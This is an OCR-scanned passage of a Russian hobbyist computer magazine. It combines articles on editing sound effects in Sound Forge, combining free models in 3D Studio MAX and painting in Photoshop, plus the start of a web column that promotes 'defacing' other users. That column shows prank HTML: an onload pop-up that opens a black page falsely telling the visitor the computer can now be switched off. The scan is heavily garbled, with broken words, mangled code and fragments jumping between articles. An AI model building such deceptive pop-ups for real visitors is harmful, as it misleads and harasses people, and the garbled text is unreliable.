} ся колонки, самые маленькие, HO самые ак- 
тивные. Вообще-то, мы когда-то мутили зву- 

ки на четверке и 
оо i) Doge - Иековалынсь Г-1 |=] особо не жалова- 

лись. Конечно, кру- 
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СТАРЫЕ ЗВУКИ 
О ГЛАВНОМ 


тит даже не очень мощный компьютер. Наши 
последние выкрутасы мы мутили на втором 
пне со 128 метрами мозгов. O них тебе и 
рассказываем. Очень приятно, что получа- 
лось менять настройки на лету. То есть у те- 
бя играет семпл, а ты крутишь настройки и 
сразу же слышишь изменения. 


Можешь брать практически любой микрофон. В 
дешевых микрофонах за 10-50 баксов сложно 
найти различия. Они все одинаково хреновые. 
Отличия начинаются со 100 баксов. Выложить 
столько за микрофон имеет смысл только тогда, 
если ты действительно серьезно увлекся звуко- 
извращениями. Не забудь, что прелести хоро- 
шего микрофона лучше чувствуются в студии, а 
студия выйдет сильно дороже. Словом, мы не 
парились и взяли обычный десятибаксовый ми- 
крофон с прищепкой к соску на груди. С него 
все и писали. Единственная реальная маза - ку- 
пить два десятибаксовых мономикрофона и 
подсоединить их через разветвитель. Получить- 
ся стерео. Конечно, продаются уже готовые сте- 
реомикрофоны, но толку от этого пластилино- 
вого стерео никакого, так как такой стереоми- 
крофон в одном корпусе и нельзя расположить 
каналы с разных сторон от источника звука. 


Для наших задач количество бит смысла особо 
не имеет, мы же не симфонии тут играем, так 
что 16-битовой звуковухи хватит за глаза. 
Главное, чтобы был вход под микрофон. Кста- 
ти, если ты решил покупать профессиональный 
микрофон, то понадобится и профессиональ- 
ный звуковой адаптер. Обычная звуковуха 
имеет ужасный усилитель. Она шумит даже, 
когда ты вынул микрофон из разъема. Так что с 
шумом при записи бороться почти бесполезно. 
Единственный совет - совать микрофон побли- 
же к источнику звука и ставить уровень записи 
на середину. Потому что на середине качество 
усилителя получше, чем по краям. Ну а дальше 
с шумами нужно бороться программно. 


Прежде всего надо повыгонять всех из своей 
комнаты, закрыть окно и навешать люлей сосе- 
дям, которые слушают "Сектор газа" у тебя под 
полом так, что хлебные крошки на столе прыга- 
ют. После того как воцарится тишина, ты услы- 
шишь самый гадкий источник шума - твой комп. 
Шумят вентилятор и колонки. Ну, колонки на 
время записи можно отключить, а вентилятор 
будет мешать. Можно, конечно, обвязывать ми- 
крофон поролоном, пытаться дотянуть микро- 
фон в другую комнату (где шум компа не слы- 
шен) или глушить вертелбляторы. Но мы запа- 
риваться не стали, так как звуковая карта все 
равно шумити без вентиляторов. И потом шумы 
в нашем деле часто на пользу. 


Есть много всяких программ для звукозаписи 
и извращений. Самая простая программа для 
звукозаписи живет в твоем Windows в развле- 
чениях и так и называется "Звукозапись". 
Виндосовский фонограф, кстати, так и не из- 
менился со времен Windows 3.1, будешь сме- 
яться, но на нем-то много лет назад и начались 
первые извращения со звуками. Словом, если 
у тебя нет терпения искать и устанавливать 
специальный софт, а креатив так и прет, то мо- 
жешь начать глумеж с фонографа. Мы заюзали 
Sound Forge 5.0, так как у него очень удобный 
интерфейс, да и фич и примочек явно поболь- 
ше. Основные принципы глумежа над звуками 
будем объяснять на примере Sound Forge, в 
других звуковых редакторах все фичи похожи 
и называются почти слово в слово. Если ты не 
нашел Sound Forge или просто хочешь альтер- 
натив, то попробуй Cool Edit или Wave Lab. 
Другим мелким звуковым программкам нет 
числа, просто в этих туева хуча функций, кото- 
рые только можно представить. 


МОР 


"Ну вот, я воткнул микрофон, врубил колонки, 
дышу в него так сексуально, а в колонках зву- 
ка нет", - заорут тут некоторые. Ну, правильно, 
воткнуть мало - надо еще в системе микрофон 
включить. Лезь в "матюгальничек" в трее и 
снимай галку с микрофона. Должно звучать. 


НАПИЛЬНИКОМ... | 
Итак, мы в Саундфордже. Какой-то он пустой и 
неприветливый. Что нужно сделать, чтобы по- 
явились все эти классные окошки и линеечки 


- мечта любого звукового извращенца? Нужно 


(0 


залезть в преференцы-тулбары, выбрать все 
тулзы и растащить их по разным краям экрана, 
чтобы не мешались. Если случайно куда-то 
слились столбики уровня звука, ползи в View и 
ставь галку Ha Play Meters. Там же можно рас- 
тянуть рабочую область на весь экран и стя- 
нуть обратно. Стоит начать работу с SF с про- 
цесса вываливания всех этих тулзов на экран. 
Так тебе будет удобнее экспериментировать. 


то есть какой-нибудь звук. У нас источника- 
ми звука выступили маленькие рюмки, боль- 
шие фужеры, стальная линейка, автомо- 
бильная канистра, электродрель, пылесос 
вкупе с тазиком воды, ну и наши собствен- 
ные... рты. Записываем так: жмешь пимпу с 
красными кружком. Вываливается мастер. 
Тут можно чего-то настроить, но на фиг нуж- 
но. Дави такую же пимпу и звучи в микро- 
фон. Тут же виден монитор, это две полоски, 
обозначающие уровень сигнала, Маркер Clip 
означает перегруз входа карты. Желтая и 
красная зона - уровень сигнала, при кото- 
ром начинаются искажения. Понятно, что 
этого лучше избегать. 


СТАРЫЕ ЗВУКИ О ГЛАВНОМ 


Получили звук, типа. Можно его сохранить 
перед пытками, на всякий случай. 


очень тихо, и извращаться со звуком, кото- 
рый еле слышно, не в кайф, потому что все 
дешевые микрофоны еще и глухие. Не во- 
прос! Увеличим звук, благо это проще про- 
стого. Выдели нужный кусок (просто тащи 
маркер мышью) и удави пимпу Normalize, от- 
регулируй параметры рычагами и дави ОК. 
Кнопка Scan Level нужна для того, чтобы опти- 
мально подогнать новую громкость сэмпла. На- 
жал сначала на эту кнопу, потом на ОК, и не 
нужно ничего регулировать, все само стало оп- 
тимальным. Иначе крути бегунок с децибелами. 
Если вообще не хочешь геморроиться, то 
юзай кнопку Volume. 


Белл - это такой учены 
лефон. А децибел - логарифмическая едини- 
ца измерения громкости. Это значит, что 
громкость меняется не линейно, а по кривой. 
Все дело в человеческом ухе. Если сделать ти- 
хий звук чуть громче, то человек услышит это 
изменение. А если сделать громкий звук чуть 
громче, то ухо не потянет, поэтому громкий 
звук приходится делать сильно громче. Лога- 
рифм для того и нужен, чтобы изменять шаг 
единицы в зависимости от громкости звука. 


| У ОИ!о 26 Ч 
Чтобы прибить шумы в моменты молчания, 
например, выдели этот кусок записи и нажми 
кнопку Mute (рядом с Normalize), и никаких 
мучений. Часто, когда что-то шумит на фоне, 
его не слышно за голосом и другими звука- 
ми. А вот в интервале между фразами, когда 
в записи появляется интервал молчания, 
шум просачивается. Вот его-то и нужно глу- 
шить кнопкой Mute в этих интервалах. 


UV PF у 
Наверняка ты заметил чек-боксы Create 
Undo, Bypass и кнопку Preview. Create Undo 
лучше всегда держать чокнутым, чтобы мож- 
но было вернуться, если что. Кстати, если 
где-то промазал, дави Ctrl+Z - не ошибешься. 
Кнопка Preview запускает в цикле твою за- 
пись, причем все изменения (в соответствии 
с тем, как ты дергаешь контролзы) слышны в 
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реалтайме. Если комп не совсем хилый, то 
можно менять и слушать сразу. Правда, звук 
чуть заедает, да и по мозгам эта штука дол- 
бит, например, дрелью. 

При нажатой кнопке Preview фича Bypass 
позволяет сравнить измененный вариант с 
оригиналом (переключает туда и обратно). 
Эти контролзы есть в каждом мастере и су- 
щественно облегчают процесс надругатель- 
ства над звуками, так что юзай. 


Кнопки эквалайзера - это три пимпы, на ко- 
торых есть две маленькие буковки EQ. Тебе, 
скорее всего, больше подойдет Paragraphic 
эквалайзер - он самый интуитивно понят- 
ный. Юзать просто: включаешь Preview, кру- 
тишь ручки и слушаешь. Те или иные частоты 
становятся тише или громче. Так можно уб- 
рать или выделить части композиции. На- 
пример, выдернуть малозаметный шепот или 
пофиксить шум. Пробуй. 


(Самые простые и заметные стереоэффекты ос- 
нованы на перекатывании звука из одного ка- 
нала в другой. То есть тебе будет казаться, что 
звук движется из левой колонки в правую или 
наоборот. Если у тебя моносигнал, то нужно 
разделить его на два канала, кликнув на кноп- 
ку Channel Converter. Не парься, дави ОК. 

После того как у тебя появилось два канала, 
нужно в одном канале звук плавно приглу- 
шить, а в другом канале - плавно восстано- 
вить, то есть приглушить наоборот. Получит- 
ся, что в одной колонке звук медленно ис- 
чезнет, а в другой колонке медленно появит- 
ся. Юзай для этого пимпы Fade In u Fade Out. 


Допустим, твой колокол (мы получили его из 
рюмки :)) имеет нефиговые размеры, и его 
нехило мотает вправо, влево. Полезно сде- 
лать, чтобы первый удар звучал громче в ле- 
вом ухе, а второй - громче в правом, ну атре- 
тий снова в левом. Для этого в Sound Forge 
используется фича Pan/Expand. В этой штуке 
ты можешь нарисовать график, по которому 
звук будет колбасить из одного канала в дру- 
гой. Поставил точку вниз - звук плавно ушел 
вправо, поставил точку вверх, звук плавно 
ушел влево. Чем нарисованный тобой гра- 
фик круче, тем быстрее происходит пере- 
прыг звука из одной колонки в другую. 


Ну атеперь мы хотим, к примеру, делать верто- 
лет или отбойный молоток, или ручную пилу, 
или может просто кто-то передергивает свой 
затвор в туалете. Процесс, одним словом, пе- 
риодический. Для этого мы используем 
фильтр Амплитудная Модуляция. При этом 
громкость твоего звука изменяется по задан- 
ному тобой графику. Можно менять по синусо- 
иде, по квадратному графику (меандру) или по 
экспоненте. Можно самому нарисовать удоб- 
ный график. Например, мы записали дрель и 
наложили на запись квадратную модуляцию - 
получится резкий прерывистый звук вертолет- 
ного винта, а если наложить синусоиду, то ус- 
лышишь бульканье отбойного молотка. 


За частотную модуляцию отвечает кнопка 
Vibrato. Здесь происходит то же самое, что и 
с амплитудной модуляцией, только меняется 
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СТАРЫЕ ЗВУКИ О ГЛАВНОМ 


не громкость, а тональность. Например, если 
говорит человек и поставить такую модуля- 
цию с квадратной формой сигнала (square), 
будет очень смешно. Наш диктор будет то да- 
вать петуха, то зажевывать пленку. А из за- 
писи пылесоса, булькающего шлангом в тазу, 
нам удалось получить звук буксующей маши- 
ны и заевшего механизма. 


Когда сверло зубного врача погружается в 
десну, то звук должен быть тише. Наоборот, 
когда пьяный врач, наконец, добрался до зу- 
ба, звук становится громче. В SF этого доби- 
лись эффектом Graphic Гаде. С помощью гра- 
фика ты можешь добиться плавного сниже- 
ния громкости твоего сэмпла в одном месте и 
увеличения в другом. Если рука с микрофо- 
ном тряслась с перепоя, то можно подкру- 
тить громкость до ровного звучания. От амп- 
литудной модуляции отличается фича тем, 
что эффект не периодический, а распростра- 
няется на всю композицию. 


Самый важный фильтр Pitch Shift. Он позволил 
нам из удара двух хрустальных рюмок получить 
колокольный звон. Эта штука сдвигает тональ- 
ность на определенную ступеньку. Это то же 
самое, что сильно раскрутить виниловую плас- 
тинку или быстро ее замедлить. В одном случае 
голоса и мелодии станут писклявыми, а в дру- 
гом случае все заревет и зажует. Это позволяет 
сделать любой голос детским или зверским. 
Рюмки превращаются в колокола, канистра 
превращается в ксилофон, дрель превращает- 
ся в бормашину для сверления зубов либо в 
елозящую двуручную пилу, а бульканье пыле- 
соса в воде превращается в шум водопада. 

С помощью частотного сдвига можно наделать 
несколько нот из одного и того же звука. То есть 
можно сделать звук бульканья разных тональ- 
ностей, а потом сыграть на них, как на нотах. 


Фича Pitch Band позволяет рисовать график 
изменения тональности по ходу всей компо- 
зиции. Поставил точку сверху - голос стал 
выше, снизу - зазвучал ниже. То есть детский 
голосок может перетечь в бас амбала или на- 
оборот. Неожиданный результат дала линей- 
ка. Мы натренькали на линейке и записали в 
сэмпл, потом повысили тональность в Pitch 
Shift, а потом нарисовали график в Pitch 
Bend, который плавно понижал тональность. 
Получился самый настоящий бластер из 
"Звездных войн", причем можно было наму- 
тить несколько видов стрелялок. Когда мы 
попробовали то же с дрелью, получился пу- 
лемет времен Второй мировой. 


Очень интересный эффект получается, если 
вывернуть сэмп наизнанку. Для этого служит 
цапа "Я". Она поворачивает волну попой 
вперед. Извратившись таким макаром над 
записью звона многострадальной рюмки, мы 
получили совсем уж неземные звуки. Вот, 
сидим теперь и премся. 


тихо! 
В общем, креатиффозный чел, мутить со 
звуком - рулез. Даже простые эксперимен- 
ты с простыми звуками дают просто потряс- 
ные эффекты. И тебе не надо знать, как все 
это пашет, задавать точные цифровые па- 
раметры и так далее - результат извраще- 
ний всегда налицо. Скажи, как можно такую 
мазу не юзать? Давай, готовь самые косми- 
ческие и нереальные звуки - ты их приме- 
нишь в своих будущих композициях. И 
пусть все тон-студии обзавидуются! ВЕ 


раде 081 


В CHEAT A 


ЛИ ДЕФЕЙС 
ДЕДУ МОРОЗУ 


Бытует мнение, что мутить на комте звуки 


Червь НН 


(реальные и нереальные) и музыкальные 
сэмалы - дико сложное дело, доступное 
разве что толстопузым дядькам из 
профессиональных тон-студий. 


BY c бесплатным 


много и они разложены по категориям: ана- 
томия, самолеты, животные, электричество и 
так далее. Здесь можно найти даже несколь- 
ко объектов на одну и ту же тему. Правда, ка- 
чество моделей не очень высокое, так как их 
заливают сюда энтузиасты. С этого сайта я 
слил две модели Санта Клауса, противогаз и 
Старца Иоду. Соответственно Санту я нашел в 
“Анатомии”, Йоду - в “Фантастике”, а проти- 
вогаз - у “Военных”. Еще я тут отрыл пару 
скелетов с запчастями и отличный мозг, 
жаль, что они не пригодились :)... 


http://www.amazing3d.com/free/free2.html 
Тут лежит бесплатная галерея всяких полез- 
ностей. Их немного, но зато, все с предосмо- 
тром. Это очень удобно, если учесть, что на 
большинстве сайтов имеется только назва- 
ние модели и два слова описания, то есть ты 
качаешь кота в мешке. Здесь я выбрал отлич- 
ный мясной тесак. 


ftp://ftp.ravenimaging.com/3drom1/3DS/ 
A вот пример FTP, Ha который свалена куча 
нерасклассифицированных моделей без 
подписей и превьюшек. Остается качать по 
имени, наудачу. 


http://www.3dspot.com/main.html 
http://www.huntfor.com/3d/links.htm 

На этих сайтах ты найдешь подборку ссылок Ha 
коллекции картинок и другие ресурсы по 3D. 


http://www.grsites.com/textures/ 
Здесь ты найдешь коллекцию всевозможных 
текстур. Все разложено по рубрикам. 


http://home.tu- 
clausthal.de/~inmc/b5/Models.html 

Ну, и наконец, сайт для фанатов Вавилона 5. 
Тут можно слить модель варлонского корабля, 
а также вход в гиперпространство. Если тебе 
это о чем-нибудь говорит, то смело качай. 


АВТОРСКИЕ ПРАВА 


На большинстве сайтов, бесплатные модели 
можно пользовать для собственных сугубо 
личных целей или для создания WEB. Если ты 
уже так навострился В трансплантации, что 
собираешься продавать своих трехмерных 
Франкенштейнов, то нужно связаться с хозя- 
ином сайта или хозяином 30 модели. Чаще 


всего, у бесплатных моделей нет хозяев, ли- 
бо хозяин сам не против, чтобы его модель 
пользовали. В текстовом файле, прилагае- 
мом к тридеэске, создатель обычно просит 
подкинуть ему бабла, если есть такая воз- 
можность и если ты хочешь, чтобы он разви- 
вался дальше в своих познаниях 30. Ты дей- 
ствительно этого хочешь? 


Я СКАЧАЛ. КАК ПОСМОТРЕТЬ? 


Если у файла нет предпросмотра, то, чтобы 
его посмотреть, тебе придется загрузить его 


и просчитать в 3D studio МАХ. Файлы с рас- 
ширением *.МАХ можно просто открыть в 
меню файл, а файлы *.3DS придется импор- 
тировать. То есть их ты сможешь открыть с 
помощью пункта импорт в меню. 


Я ОТКРЫЛ ФАЙЛ. ЧТО ДЕЛАТЬ ТЕПЕРЬ? 


Обычно, после того, как ты что-то открыл, у 
тебя сразу появляются четыре стандарт- 
ных окошка: “сверху”, “спереди”, “слева”, 
“перспектива”. Если ты когда-нибудь зани- 
мался черчением, то знаешь что такое про- 
екции. Проекции - это три плоских изоб- 
ражения, если их сопоставить, то получит- 
ся трехмерное изображение. 

В окошке перспектива ты как раз видишь 
результат сопоставления проекций. Проек- 
ции незаменимы, когда ты манипулируешь 
в трехмерном пространстве. По перспекти- 
ве не всегда можно узнать точное распо- 
ложение объекта, а на проекциях всегда 
видно, на какой высоте и на каком Удале- 
нии объект. 


ПЕРСПЕКТИВА 


Чтобы просчитать объект, тебе нужно настро- 
ить его вид. Например, если модель будет 
слишком далеко, то ты ее не разглядишь, или 
модель может быть повернута не той сторо- 
ной. Разглядеть модель со всех сторон тебе 
помогут инструменты в левом нижнем углу 
экрана 30 Max’a. Выдели окошко, в котором 
хочешь поправить изображение (для этого 
кликни на него). После этого можешь исполь- 
зовать лупу, чтобы приблизить объект, руку, 
чтобы подвинуть изображение. Круг со 
стрелками поможет тебе повернуть модель и 
разглядеть ее с разных сторон. Уголок позво- 
лит увеличить угол твоего зрения, то есть рас- 
ширить панораму. А стрелка увеличит вы- 
бранное окно на весь экран. Эта функция 
нужна для тех, у кого маленький монитор, и 
сложно разглядеть детали в маленьком окош- 
ке. Эти инструменты не меняют модель, они 
меняют только отображение модели в твоих 
виртуальных глазах. То есть это рычаги уп- 
равления твоими виртуальным взглядом. 


ПРОСЧЕТ 


Обычно в окошках проекций и перспективы 
показан предварительный вид модели. Ты ви- 


Применяем инструмент вращения для шланга противогаза. 
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Сгибаем руку под тесак модификатором “изгиб”. 
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простейшими модификаторами типа изгиба 
(Бепа), то сможешь не только использовать чу- 
жие объекты, но и менять их. Когда ты в совер- 
_ шенстве овладеешь модификаторами, смо- 
_жешь намутить любую 30 сцену с нуля. 


Лазерного меча у нас не нашлось, поэтому в 
руки Санта Иоды мы дадим нож мясника. С 
ножом нужно проделать стандартные опера- 
ции: импортировать его в сцену, повернуть, 
масштабировать, и подвести поближе к руке. 
Теперь нам нужно, чтобы рука схватила нож. 
Цля этого мы согнем ее модификатором. 


того чтобы заюзать модификатор нужно 
ти в меню “модификаторы”, на правой па- 
нели. Кликни на голубую дугу вверху правой 
панели. Теперь тебе нужно шлепнуть по кноп- 
ке “Вепа” (изгиб). Не забудь перед этим выде- 
лить сгибаемый объект. Появятся настройки 
модификатора, и ты сможешь задать ось, по 
которой происходит изгиб (Х, Y, 7), и угол, на 
который у нас все прогнется. Как видишь, ва- 
режка согнулась. Кстати, чтобы лучше разгля- 
деть этот процесс, пришлось приблизить ва- 
режку лупой и развернуть перспективу во весь 
экран. Теперь осталось передвинуть тесак в 


уже согнутую руку. 


МАТЕРИАЛЫ 


Что-то наш герой получился каким-то скуч- 
ным. Ну, кто сейчас так ходит? Сразу видно, 
что инопланетянин. Нужно поработать над 
прикидом. Для этого запусти редактор матери- 
ала. Этот редактор включается кнопкой из че- 


вогаз (на вонючем болоте „„ивет, 
как-никак). Противогаз я импорти- 
ровал в ту же сцену. У противогаза то- 
же было что-то типа головы, это что-то при- 
шлось удалить. Голова Деда Мороза тоже 
больше не нужна, поэтому и ее удаляем со 
спокойной душой. Противогаз с помощью 
масштабирования и движения легко прила- 
живается к физиономии старца. Только, что 
делать со шлангом? Решено повернуть шланг 
и направить его под крутку.Чтобы повернуть 


объект нужно выделить его и применить ин- 
струмент поворота. Этот инструмент вызыва- 
ется нажатием круглой стрелочки. Также как 
с передвижением нужно выбрать объект и 
выбрать ось, вокруг которой будем вращать. 
Выбираем шланг, выбираем ось и начинаем 
его вращать до тех пор, пока он не залезет 
Санте под куртку. 


МОДИФИКАЦИЯ ОБЪЕКТОВ 


Ты уже научился более-менее передвигать, по- 
ворачивать и менять размеры у объектов. В 
принципе этого уже вполне достаточно для ус- 
пешной трансплантации. Теперь давай попро- 
буем менять сами объекты. В 3D studio есть 
масса способов изменить объект. Объект с по- 
мощью модификаторов можно абсолютно пе- 
ределать. Если ты научишься пользоваться 


тырех шариков. Она рядом с чайником, запус- 
кающим просчет. Ты можешь вызвать редак- 
тор материалов и с клавиатуры, буквой “М”. 


При запуске редактора ты увидишь не- 
сколько больших шаров. На эти шары натя- 
гиваются примеры материалов. В настрой- 
ках материала ты указываешь цвет, тексту- 
ру, и свойства света, проходящего через ма- 
териал. Чтобы наложить материал на объек- 
ты в твоей сцене, нужно выделить объект, 
выбрать нужный материал и кликнуть кноп- 
ку “присвоить материал выделенному объ- 
екту”. На этой кнопке нарисованы шарик, 
стрелочка и кубик. Но проще всего взять 
материал мышкой и перетащить его на нуж- 
ный объект. Чтобы выбрать материал - 
кликни на нужный шар. 


КУРТКА 


Материал состоит из текстур и настроек их 
отображения. Чтобы получить стильную курт- 
Ky для нашего инопланетянина я использовал 
стандартную текстуру “Блестящий хром”. Тек- 
стуры можно настроить на вкладке “карты” 
редактора материала. Тут, кстати и написано, 
что текстура будет делать. Я поставил, эту тек- 
стуру на стопроцентное отражение. Все очень 
просто. Когда вставляешь текстуру отраже- 
ния, то кликаешь на кнопку рядом, и у тебя 
всплывает браузер. Через него ты можешь за- 
грузить любую картинку в качестве текстуры. 
Еще я изменил цвет рассеивания на зеленый в 
основных настройках. В результате получи- 
лось зеленое, переливающееся зеркало. Пе- 
реливается оно благодаря текстуре. 


САПОГИ И ПОЯС 


На сапоги я пустил обычный хром (металл). 
Эту текстуру я нашел в той же стандартной 
библиотеке и тоже поставил ее на отраже- 
ние. Поскольку цвет я не менял, то текстура 
наложилась со своими обычными цветами. 


НАДУВНОЙ МАТЕРИАЛ 


Последний писк моды - это использование про- 
зрачных надувных материалов в одежде. Для 
этого я изменил цвет материала на синий и по- 
высил его прозрачность, все это делается в ос- 
новных настройках. Тут нужно обратить внима- 
ние на настройку бликов. Блики нужно пони- 
зить и сделать более четкими для прозрачного 
материала. Ну а дальше я использовал вместо 
карты на “самоосвещение” другой стандартный 
материал: “отражение/преломление”. Этот ма- 
териал придал надувной вид краям куртки. 


Стандартный материал “отражение/прелом- 
ление” умеет не только отражать как стекло, 
онеще и искажает пространство, будто смот- 
ришь через линзу. Поэтому получается такой 
прикольный эффект. 


КАК ПОКРАСИТЬ ОКРУЖАЮЩЕЕ 
ПРОСТРАНСТВО? 

У многих новичков это первый вопрос. По 
умолчанию МАХ все рендерит на черном фо- 
не. Цвет фона настраивается в меню “сре- 
да”. Там же можно прицепить какую-нибудь 


картинку на фон. 


ОСОБЕННОСТИ ИНТЕРФЕЙСА 


У 30 Max’a куча своих нестандартных осо- 
бенностей. У каждой функции туча настро- 
ек, но обычно ты используешь только одну 
или две. Эти настройки, конечно же, не вле- 
зают на экран, но скроллингов нет. Поэтому, 
чтобы увидеть настройки, не влезшие на эк- 
ран, используется рука. Чтобы рука появи- 
лась, нужно навести курсор в промежуток 
между кнопками. Когда пятерня нарисуется 
нужно схватить панель меню и подвинуть ее 
так, чтобы нужные тебе настройки выползли 
из-за границы видимости. В общем, система 
ниппель. 


НАПОСЛЕДОК 


Сложность 3D Studio не сломит твоего Kpe- 
атива. Достаточно выучить несколько про- 
стых приемов, и ты сможешь творить очень 
эффектные штуки в 30. Ты можешь заму- 
тить себе домашнюю страничку в интерне- 
те, или отрендерить себе прикольный ра- 
бочий стол, или даже нарисовать плакат, 
чтобы вывести в типографии и повесить на 
стену. Но если ты решил заняться 30 серь- 
езно, то запасись временем на обучение и 
деньгами на самый современный компью- 
тер. Даже самого крутого писюка не хвата- 
ет для изощренных 3D монстров. GE 
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Ме ФОТОШОП 


РЕАЛЬНОЕ ТЕЛО 


В прошлый раз нам таки удалось 


выглечдяецее тело, используя талант м 


штаны, отполировать меч, пустить ды- 

мок из ствола, сделать композицию и 
тем самым закончить пикчуру. Фотошоп и я 
поможем тебе в решении этих важных задач, 
так что заводи мотор, грузи последнюю кар- 
тинку и готовь верные brushes - приступаем ;). 


ШТАНИШКИ С БОЛЬШИМИ КАРМАШКАМИ 


Итак, первое, что мы будем делать для наше- 
го мэна, - разрисовывать его линялое трико. 
Что характерно для штанов и для одежды во- 
обще? Пожалуй, складки - значит, их надо 
как-то выделить на рисунке. В нашем случае 
на чуваке сапоги - штаны будут слегка све- 
шиваться над их голенищами. Выбери инст- 
румент paintbrush, задай маленький размер 
кисти и сделай пару мазков по каждой ноге 
так, как показано на рисунке 1. Это и будут 
свешивающиеся части. 


B этом месяце нам предстоит оформить 


(Следующий этап - наложение тени для прида- 
ния объема. Напоминаю, чтобы не вылезать 
кистями за необходимые пределы, для каждо- 
го объекта, будь то штаны, торс, шлем, следует 
делать и сохранять выделения. С помощью за- 
грузки сохраненных выделений к ним всегда 
можно будет вернуться для доработки дета- 
лей. Обведи штаны пеном (пером) или поли- 
гональным лассо и сохрани выделение. Те- 
перь работаем инструментом аэрограф, за- 
крашиваем более интенсивно черным цветом 


i рисунка повисли в воздухе. 


Участки, закрытые от света, - получиться 
должно примерно так, как на рисунке 2. 


Штаны получились какими-то слишком глад- 
кими, не правда ли :(? Придется применить 
какой-либо дешевый эффект. Я выбрал 
фильтр Paint Daubts (Filter->Artistic->Paint 
Daubts, Brush Size=8, Sharpness=7). В резуль- 


тате появилась претензия на материю, KOTO- 
рую ты можешь пронаблюдать на рисунке 3. 
Теперь осталось только раскрасить наши 
рейтузы. Это можно сделать несколькими 
способами, я по привычке пользуюсь коман- 
дой Image->Adjust->Hue/Saturation (ну, нра- 
вится мне первое слово :)). Главное - не за- 
быть выставить галочку Colorize, и потом уже 


вертеть ползунки, подбирая нужные цвет и 
насыщенность (рис. 4). 


МЕТАЛЛИЧЕСКАЯ СЮИТА 


Следующий этап после штанов - металличес- 
кое обмундирование и оружие бойца. Нач- 
нем со шлема. Как положено, обводим его 
инструментом выделения. Чтобы исключить 
из селекшена прорезь для глаз, выдели ее, 
удерживая кнопку Alt (рядом с курсором дол- 
жен появиться значок “-”). Размоем его мето- 
дом Гаусса (Filter->Blur->Gaussian Blur, ради- 
ус=2) и снова затеняем аэрографом. Обрати 
внимание: поскольку металл - отражающая 
поверхность, контраст между светлыми и за- 
тененными участками будет выражен намно- 


го сильнее, а границы с прорезью для глаз 
также следует очернить почетче (рис. 5). 

Далее можно добавить резкости командой 
Sharpen и придать цвет с помощью все тех же 
Hue/Saturation, и довести на свой вкус (рис. 6). 


Что касается лезвия меча, то здесь я советую 
раскрашивать его градиентом по половин- 
кам. Последовательность действий такая: 
сначала выделяется одна вертикальная сто- 
рона клинка, затем выбирается инструмент 


Linear Gradient, и лезвие закрашивается лег- 
ким движением руки. Примерную начальную 
и конечную точку градиента, а также резуль- 
тат заливки ты видишь на рисунке 7. То же 
самое нужно проделать и с другой полови- 
ной, только направление градиента будет 
противоположным. С гардой и рукояткой 
разберись сам :). 


БЭКГРАУНД 


Пришло время позаботиться о заднем фоне. 
Если на основной картинке, где нарисован 
парень, ты работал не на слоях, а на основ- 
ном слое Background, лучше перенести все 
нарисованное хозяйство на новый слой. Ес- 
ли контуры картинки четкие, то можно вос- 
пользоваться инструментом Magic Wand, 
щелкнув на белом месте, а затем инвертиро- 
вать выбор. Выделенной окажется вся кар- 
тинка, вырезаем ее и вставляем на новый 
слой. Создаем новый слой и располагаем его 
под слоем с бойцом. Этот слой предназначен 


для фона, и мы, не мудрствуя лукаво, зальем 
его линейным градиентом (смотри рисунок). 
Расположи градиент так, чтобы ствол писто- 
лета был на черном - это понадобится нам, 
когда мы будем пускать дым (в противном 


случае слабый контраст все испортит), а на 
белую часть (пол) кинем тень (рис. 8). 
ДЕЛАЕМ SMOKING 

Теперь сделаем забавный спецэффект с дым- 
ком. Создай еще один слой и расположи его над 
слоем, где расположен пистолет. Напоминаю, 
сзади должен быть темный фон. Можно, конеч- 
но, сразу нарисовать подобие дымка аэрогра- 
фом, но есть способ для более реалистичного 
представления. Выбираем инструмент Airbrush, 
размер кисти - побольше, цвет делаем серым, 
Pressure - слабым, процентов 10, и делаем не- 
сколько тычков возле дула. Затем меняем наст- 
ройки аэрографа: Mode - Dissolve, и раскидыва- 
ем понемногу черные и белые точки (рис. 9). 


РИСУЕМ В ФОТОШОПЕ 


После этого выбираем инструмент Smudge 
(палец) и размазываем “дымок” в виде бук- 
вы “5”. Потом выбираем ластик, убираем 
лишний жир, а также для полной правдопо- 
добности полезно потыкать ластиком в раз- 
ные места дыма. В итоге получаем приблизи- 
тельно следующее (рис. 10). 


ТЕНЬ НА ПЛЕТЕНЬ 


Ну вот, готово практически все, кроме тени. 
Честно говоря, гораздо удобнее делать ее с 
помощью специальных фильтров - я, напри- 
мер, пользуюсь Extenis PhotoCastShadow. 
Здесь ее и удобнее настраивать, и опций до- 
статочно много (но тормози-и-ит). Тем не ме- 
нее можно обойтись и стандартными средст- 
вами фотошопы. 


Выдели по контуру главную фигуру. Скопи- 
руй выделение в буфер, создавай новый 
слой и вставляй туда содержимое буфера. 
Скопированное на новый слой затемняем 
(вызови меню яркости и контраста и поставь 
оба параметра по нулям, потом фигура зали- 
вается черным цветом), а затем добавляем 
полупрозрачность. Чтобы тень приняла пра- 
вильную форму, ее слой надо трансформи- 
ровать (Edit -> Free Transform), а именно от- 
разить по вертикали и наклонить в нужном 
направлении. Тень подгоняется к нужному 
месту и прибивается :) (рис. 11). 


Вот, в общем-то, и вся наука. Можно лишь 
добавить светлый ореольчик вокруг кон- 
тура фигуры там, где темный бэкграунд. 
Технология проста, если ее знать, а рисо- 
вать может абсолютно любой. Нужно 
только тренироваться... 
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TIPS OF WEB 


Хайя, приятель! Тема этого номера вдохновила нас Ha подвиги, и мы решили устроить | 
тотальный дефейс юзверьским ослам и прочим нетшкафам. Теперь мы делимся с тобой своим 
опытом. А то что это получается? Тебе пагу и. - всегда пожалуйста, а ты даже 


гопника наказать не можешь? Непорядок 


общем, вникай и готовь карательные рейды. 


Естественно, нам придется заморочиться со скриптами, ибо нет ничего злобнее. 


Что может бесить больше поп-апов? Эти 
жуткие звери заставляют тебя метаться 
мышом по всему экрану и мешают обозре- 
вать... MMM... ну, что бы там ни было. 0т- 
личная штука для низведения! 

Ну, если ты - лапоть и ни фига не знаешь, 
как поп-апы делаются, смотри сюда: 
<BODY ONLOAD="window.open(‘xakep.htm’, 


“Hy и чо?! Это что - страшное западло?” - 
будешь флеймить ты. Нет, конечно. Но что 
нам мешает нашу попу апу мундифициро- 
вать? Вот, смотри. Давай поменяем нашу 


Пугательная ;). Но чтобы и нам с тобой ста- 
ло страшно, нужно мумифицировать файло, 
которое грузится в попу апу. Прописываем: 
<BODY bgcolor="#000000"> 

<br> 

и еще штучек десять <br> 

<br> 

<center> 

<font color="FF9900” size="12” 
face="System”>Tenepb питание компьюте- 
ра<Ь">можно отключить</п> 

</center> 

</BODY> 

Если ты еще не воткнул, TO поясняю Ha 
